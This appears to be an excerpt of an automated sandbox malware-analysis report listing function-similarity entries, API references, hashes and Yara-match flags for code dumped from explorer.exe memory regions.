                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 1037122555-1018135373
                                                                                                                                                                                                                        • Opcode ID: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction ID: cb4ab2455fc65eedca18c0ea40d1ed3f6558577b8dd6469572bf3e67efc9a5d4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA21653760468286C730DF1AE5503AE7760F389BA5F05D21ADF9A07B54CF3AE896CB05
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0E124972
                                                                                                                                                                                                                        • RaiseException.KERNEL32 ref: 0E12499B
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0E1249FC
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E12494F
                                                                                                                                                                                                                          • Part of subcall function 0E12289C: _getptd_noexit.LIBCMT ref: 0E1228A2
                                                                                                                                                                                                                          • Part of subcall function 0E12289C: _amsg_exit.LIBCMT ref: 0E1228B2
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E124A01
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0E124A0D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                         • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                         • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 1037122555-1018135373
                                                                                                                                                                                                                        • Opcode ID: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction ID: 1e13caa0cc2a32849cbbb69a801d347633af7313891681941c4681b4a9dca135
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D2151362006A186D731DF56E44039EB7A0F388BA5F14462ADFAA07B54CB3AD8D6CB01
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0FF64972
                                                                                                                                                                                                                        • RaiseException.KERNEL32 ref: 0FF6499B
                                                                                                                                                                                                                        • __DestructExceptionObject.LIBCMT ref: 0FF649FC
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0FF6494F
                                                                                                                                                                                                                          • Part of subcall function 0FF6289C: _getptd_noexit.LIBCMT ref: 0FF628A2
                                                                                                                                                                                                                          • Part of subcall function 0FF6289C: _amsg_exit.LIBCMT ref: 0FF628B2
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0FF64A01
                                                                                                                                                                                                                        • _getptd.LIBCMT ref: 0FF64A0D
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                         • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                         • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 1037122555-1018135373
                                                                                                                                                                                                                        • Opcode ID: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction ID: 26478bb308a1a8da90186fdfabaa24a6f78ca78d19d74a13f394dcafd38e203c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c2dc04b7f9ed974ce763bfc3647dfdf4ed1e2eeafffbde918f2164c54a5c0928
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9421213660478186D730DF16E44036EB760F789BA9F544222DF9947B96CF3EE486CB05
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DFBD9D5
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DFBD9CA
                                                                                                                                                                                                                          • Part of subcall function 0DFBF7C0: _getptd_noexit.LIBCMT ref: 0DFBF7C4
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0DFBDA1D
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DFBDA2C
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DFBDA37
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: 67c77fa2de6623847f3561685a9316e424b417909895b8b648bd336a93126ac9
                                                                                                                                                                                                                        • Instruction ID: a79e6b3f055af517296cb102c7a27ad54323989313411b3c31d15cb303f40bd6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67c77fa2de6623847f3561685a9316e424b417909895b8b648bd336a93126ac9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A210A62B0C38182DB25576F9D803B97654B744BF4F14C225EB5B0BB99CA6CC9518B02
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E11D9D5
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E11D9CA
                                                                                                                                                                                                                          • Part of subcall function 0E11F7C0: _getptd_noexit.LIBCMT ref: 0E11F7C4
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0E11DA1D
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E11DA2C
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E11DA37
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: 67c77fa2de6623847f3561685a9316e424b417909895b8b648bd336a93126ac9
                                                                                                                                                                                                                        • Instruction ID: b7d0f046b25e730d796b6687e249cea88527e2c0c651aebb87b582ae5d5ba46d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67c77fa2de6623847f3561685a9316e424b417909895b8b648bd336a93126ac9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3213BA27093D582DF25D766B49032A6690B7887E1F6447B5EA9A07B98CB7CCDC18B00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0FF5D9D5
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0FF5D9CA
                                                                                                                                                                                                                          • Part of subcall function 0FF5F7C0: _getptd_noexit.LIBCMT ref: 0FF5F7C4
                                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0FF5DA1D
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0FF5DA2C
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0FF5DA37
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 781512312-0
                                                                                                                                                                                                                        • Opcode ID: 67c77fa2de6623847f3561685a9316e424b417909895b8b648bd336a93126ac9
                                                                                                                                                                                                                        • Instruction ID: 5edb036aa00e1d9af180155f46fec0bcab275a08b7da03981cc599b9d53c5d97
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67c77fa2de6623847f3561685a9316e424b417909895b8b648bd336a93126ac9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C721F9A3B0E3C182DF255BA5998033E7660BB44FD4F944261EF9A4BB9BDE6CC541CB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$CreateThreadlstrcatmallocwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2370468470-0
                                                                                                                                                                                                                        • Opcode ID: 91b3dae27dcb76e74acb243b2bbc3a773a63738140735dbff53731b8c22fd2a8
                                                                                                                                                                                                                        • Instruction ID: c6e7cb195e945c0a3bc53b0df349b23d5a286e6c945e402c62939d6a09a16fda
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91b3dae27dcb76e74acb243b2bbc3a773a63738140735dbff53731b8c22fd2a8
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B117961704B5286EB549FA6B94037AB3A0FB89FD4F088136DE8B53B68DF7CC0448B00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$CreateThreadlstrcatmallocwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2370468470-0
                                                                                                                                                                                                                        • Opcode ID: 7b05df834634f58217fb39a2c7308ad0ba22bb220be148628f94064f461434cb
                                                                                                                                                                                                                        • Instruction ID: d44ede6d98a8e075eb1e8b8cd0c9d36b2efb0b6f2085dada6f8bd5ad22a2a2d8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b05df834634f58217fb39a2c7308ad0ba22bb220be148628f94064f461434cb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E116A71604B8086EB549F63E9103AAB3A0FB8CFD1F480825DE8A63B58DF3CC1808B01
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$CreateThreadlstrcatmallocwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2370468470-0
                                                                                                                                                                                                                        • Opcode ID: 7b05df834634f58217fb39a2c7308ad0ba22bb220be148628f94064f461434cb
                                                                                                                                                                                                                        • Instruction ID: be2f0cfd2d276b819f575bf71aadbb4acf9d631af08f107e572959828220b02d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b05df834634f58217fb39a2c7308ad0ba22bb220be148628f94064f461434cb
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95112961704B8286EB649F62B95437AB3A5FF89FD4F8840359E8A57B15DF3CC1468B00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$malloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3301496367-0
                                                                                                                                                                                                                        • Opcode ID: 929abbbedb95f8e168d103e21051bd23e2847469a7dec5fc2b114ceb9a50bd9c
                                                                                                                                                                                                                        • Instruction ID: ed63bc48831fb66f999a57dbd657fd3abff5531ab327fd73f27dfab70d68919b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 929abbbedb95f8e168d103e21051bd23e2847469a7dec5fc2b114ceb9a50bd9c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE315976614A8186DA10DFAAE84436AB7A5F789BD8F548026DF8E53B28DF7CC145CB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$malloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3301496367-0
                                                                                                                                                                                                                        • Opcode ID: 6ccdbf1fb6fb95a0b2190dd9fd5b23860eaccc73a345d3d1148db9b639e16da5
                                                                                                                                                                                                                        • Instruction ID: 056831225f0913be261d7304dfef89d1c3dc42d9d7c9232c4a0af5e17bd99003
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ccdbf1fb6fb95a0b2190dd9fd5b23860eaccc73a345d3d1148db9b639e16da5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB3155B6A14B8186DB10DFA6E84439AB7A4F788BC8F554425EF8E53B18DF7CC485CB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrlen$malloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3301496367-0
                                                                                                                                                                                                                        • Opcode ID: 6ccdbf1fb6fb95a0b2190dd9fd5b23860eaccc73a345d3d1148db9b639e16da5
                                                                                                                                                                                                                        • Instruction ID: 1770e66cbbc5411cbb3d65dedd3ba69b240708d356d6c8b1570af95e066fbdfe
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ccdbf1fb6fb95a0b2190dd9fd5b23860eaccc73a345d3d1148db9b639e16da5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B313B76614B8286DA10DF66E84436AB7A5FB88FC4F845125DF8E57B15DF3CD08ACB00
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DEFB800
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DEFB7F5
                                                                                                                                                                                                                          • Part of subcall function 0DEEF0F5: _getptd_noexit.LIBCMT ref: 0DEEF0F9
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0DEFB8A3
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0DEFB8AE
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692158037.000000000DED0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ded0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1573762532-0
                                                                                                                                                                                                                        • Opcode ID: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction ID: 7290e0230d8fda92185e52709cc6476222a6bdbccc155bcfa025caacb33c8ca9
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE417031518F9E8BCB28AB19C4502B673D0FF84329B95666FE6DAD7194EF24C841C781
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0824B800
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0824B7F5
                                                                                                                                                                                                                          • Part of subcall function 0823F0F5: _getptd_noexit.LIBCMT ref: 0823F0F9
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0824B8A3
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0824B8AE
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2680336364.0000000008220000.00000040.00000001.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_8220000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1573762532-0
                                                                                                                                                                                                                        • Opcode ID: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction ID: 8327923c1365ba87185b0384558adcbba69d1bcab72108eb51a4c6fbba08a6ec
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25412B34538B5F8BCB2CABA980501B673D0FB54333B98522FE4D6C7194EA64C843D7A1
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E0AB800
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E0AB7F5
                                                                                                                                                                                                                          • Part of subcall function 0E09F0F5: _getptd_noexit.LIBCMT ref: 0E09F0F9
                                                                                                                                                                                                                        • _errno.LIBCMT ref: 0E0AB8A3
                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0E0AB8AE
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1573762532-0
                                                                                                                                                                                                                        • Opcode ID: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction ID: 3825b951a884695e097fc24b32cc13d3420eb51477a0d16b6fb4de5ad55a4833
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b30f5e59af2c3f590f3a96d94839e83755bdd1bbc3e7637d5a3ce66ed430a80
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7414C31518B5E8BCBB8AB9D80602B673D0FB54391B9C032FE6D6C7194EB24CC42DB81
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _malloc_crt.LIBCMT ref: 0DFC3479
                                                                                                                                                                                                                          • Part of subcall function 0DFC04F8: malloc.LIBCMT ref: 0DFC0523
                                                                                                                                                                                                                          • Part of subcall function 0DFC04F8: Sleep.KERNEL32 ref: 0DFC0536
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DFC357A
                                                                                                                                                                                                                        • free.LIBCMT ref: 0DFC3596
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2523592665-0
                                                                                                                                                                                                                        • Opcode ID: c9615a3cf7ce7a9ddaf4daaf2dfe0ec49352c1298dc07cc5e1d8857c34935f8c
                                                                                                                                                                                                                        • Instruction ID: a0ec185729283a9da7c42c48bce3dc9a5bf55e3cff6f341411be7292151746d5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9615a3cf7ce7a9ddaf4daaf2dfe0ec49352c1298dc07cc5e1d8857c34935f8c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9351CF36704B4293EB21EF1AEA4036A33A4F788BA8F45C1299F4D47B10EF38D4768740
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _malloc_crt.LIBCMT ref: 0E123479
                                                                                                                                                                                                                          • Part of subcall function 0E1204F8: malloc.LIBCMT ref: 0E120523
                                                                                                                                                                                                                          • Part of subcall function 0E1204F8: Sleep.KERNEL32 ref: 0E120536
                                                                                                                                                                                                                        • free.LIBCMT ref: 0E12357A
                                                                                                                                                                                                                        • free.LIBCMT ref: 0E123596
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2523592665-0
                                                                                                                                                                                                                        • Opcode ID: c9615a3cf7ce7a9ddaf4daaf2dfe0ec49352c1298dc07cc5e1d8857c34935f8c
                                                                                                                                                                                                                        • Instruction ID: 43bfd61e7eacf0e0080de19c7990de0f1617e954b164cffa52f1e727a2e1f297
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9615a3cf7ce7a9ddaf4daaf2dfe0ec49352c1298dc07cc5e1d8857c34935f8c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75519932301B5193EB25DB26ED9035A73A4F788B98F5446399E6D07B10EF3CC9B68744
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _malloc_crt.LIBCMT ref: 0FF63479
                                                                                                                                                                                                                          • Part of subcall function 0FF604F8: malloc.LIBCMT ref: 0FF60523
                                                                                                                                                                                                                          • Part of subcall function 0FF604F8: Sleep.KERNEL32 ref: 0FF60536
                                                                                                                                                                                                                        • free.LIBCMT ref: 0FF6357A
                                                                                                                                                                                                                        • free.LIBCMT ref: 0FF63596
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
